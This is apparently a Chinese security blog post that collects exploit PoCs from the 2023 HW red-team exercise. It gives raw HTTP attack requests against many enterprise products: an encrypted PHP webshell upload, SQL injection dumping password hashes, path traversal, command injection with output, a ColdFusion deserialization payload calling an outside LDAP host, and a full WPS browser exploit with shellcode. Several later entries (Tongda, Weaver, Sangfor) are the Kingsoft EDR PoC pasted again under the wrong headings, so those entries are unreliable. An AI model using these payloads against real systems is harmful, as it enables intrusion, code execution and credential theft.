正文

2023HW-Day1至Day3漏洞汇总(含POC)

admin
admin V管理员 /0 评论 /1159 阅读
0812
此篇文章发布距今已超过811天,您需要注意文章的内容或图片是否可用!

0x01 阅读须知

凯撒安全实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞列表

金山终端安全系统V9任意文件上传漏洞

POST /inter/software_relation.php HTTP/1.1 Host: 192.168.249.137:6868 Content-Length: 1557 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://192.168.249.137:6868 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolFileName" ../../datav.php ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolDescri" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="id" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="version" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="sofe_typeof" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="fileSize" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="param" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolName" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> ------WebKitFormBoundaryxRP5VjBKdqBrCixM


金山edr代码执行漏洞


开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php


广联达 Linkworks GetIMDictionary


POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --


Openfire身份认证绕过漏洞


GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1

Milesight VPN server.js 任意文件读取漏洞

GET /../etc/passwd HTTP/1.1 Host: Accept: / Content-Type: application/x-www-form-urlencoded

Eramba任意代码执行漏洞

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close



HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469
<!DOCTYPE html><html><head><meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Error: The exit status code '127' says something went wrong:stderr: &quot;sh: 1: --dpi: not found&quot;stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever&quot;command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'--margin-right '0' --margin-top '0' --orientation 'Landscape'--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>

Adobe ColdFusion 反序列化漏洞

漏洞编号

CVE-2023-29300

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1Host: 1.2.3.4:1234User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 400Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipcmd: id
argumentCollection=<wddxPacket version='1.0'>    <header/>    <data>        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>            <var name='dataSourceName'>                <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>            </var>            <var name='autoCommit'>                <boolean value='true'/>            </var>        </struct>    </data></wddxPacket>

1Panel loadfile 后台文件读取漏洞

POST /api/v1/file/loadfile 
{"paht":"/etc/passwd"}



金山WPS RCE

影响范围:

WPS Office 2023 个人班<11.1.0.15120

WOS Office 2019企业版 < 11.8.2.12085

POC说明:

在1.html当前路径下启动http server 并监听80端口,修改hosts文件127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn 漏洞触发需让域名规则满足 clientweb.docer.wps.cn.{xxx}wps.cn cloudwps.cn 和 wps.cn 无任何关系

关键代码

<script>if(typeof alert === "undefined"){alert = console.log;}let f64 = new Float64Array(1);let u32 = new Uint32Array(f64.buffer);function d2u(v) {f64[0] = v;return u32;}function u2d(lo, hi) {u32[0] = lo;u32[1] = hi;return f64[0];}function gc(){ // majorfor (let i = 0; i < 0x10; i++) {new Array(0x100000);}}function foo(bug) {function C(z) {Error.prepareStackTrace = function(t, B) {return B[z].getThis();};let p = Error().stack;Error.prepareStackTrace = null;return p;}function J() {}var optim = false;var opt = new Function('a', 'b', 'c','if(typeof a==='number'){if(a>2){for(vari=0;i<100;i++);return;}b.d(a,b,1);return}' +'g++;'.repeat(70));var e = null;J.prototype.d = new Function('a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');J.prototype.a = new Function('a', 'a.b(0,a)');J.prototype.b = new Function('a', 'b','b.c();if(a){' +'g++;'.repeat(70) + '}');J.prototype.c = function() {if (optim) {var z = C(3);var p = C(3);z[0] = 0;e = {M: z, C: p};}};var a = new J();// jit optimif (bug) {for (var V = 0; 1E4 > V; V++) {opt(0 == V % 4 ? 1 : 4, a, 1);}}optim = true;opt(1, a, 1);return e;}e1 = foo(false);e2 = foo(true);delete e2.M[0];let hole = e2.C[0];let map = new Map();map.set('asd', 8);map.set(hole, 0x8);map.delete(hole);map.delete(hole);map.delete("asd");map.set(0x20, "aaaa");let arr3 = new Array(0);let arr4 = new Array(0);let arr5 = new Array(1);let oob_array = [];oob_array.push(1.1);map.set("1", -1);let obj_array = {m: 1337, target: gc};let ab = new ArrayBuffer(1337);let object_idx = undefined;let object_idx_flag = undefined;let max_size = 0x1000;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 0xa72) {object_idx = i;object_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 0xa72) {object_idx = i + 1;object_idx_flag = 0;break;}}function addrof(obj_para) {obj_array.target = obj_para;let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;obj_array.target = gc;return addr;}function fakeobj(addr) {let r8 = d2u(oob_array[object_idx]);if (object_idx_flag === 0) {oob_array[object_idx] = u2d(addr, r8[1]);}else {oob_array[object_idx] = u2d(r8[0], addr);}return obj_array.target;}let bk_idx = undefined;let bk_idx_flag = undefined;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 1337) {bk_idx = i;bk_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 1337) {bk_idx = i + 1;bk_idx_flag = 0;break;}}let dv = new DataView(ab);function get_32(addr) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}let val = dv.getUint32(0, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);return val;}function set_32(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint32(0, val, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);}function write8(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint8(0, val);}let fake_length = get_32(addrof(oob_array)+12);set_32(get_32(addrof(oob_array)+8)+4,fake_length);let wasm_code = newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasm_mod = new WebAssembly.Module(wasm_code);let wasm_instance = new WebAssembly.Instance(wasm_mod);let f = wasm_instance.exports.main;let target_addr = addrof(wasm_instance)+0x40;let rwx_mem = get_32(target_addr);//alert("rwx_mem is"+rwx_mem.toString(16));const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,0x00]);for(let i=0;i<shellcode.length;i++){write8(rwx_mem+i,shellcode[i]);}f();</script>

通达

通达OA sql注入漏洞 CVE-2023-4165 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php0

通达OA sql注入漏洞 CVE-2023-4166 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php1

泛微

泛微E-Office9文件上传漏洞 CVE-2023-2648 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php2

泛微E-Office9文件上传漏洞 CVE-2023-2523 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php3

泛微 Weaver E-Office9 前台文件包含

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php4

深信服

深信服应用交付系统命令执行漏洞 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
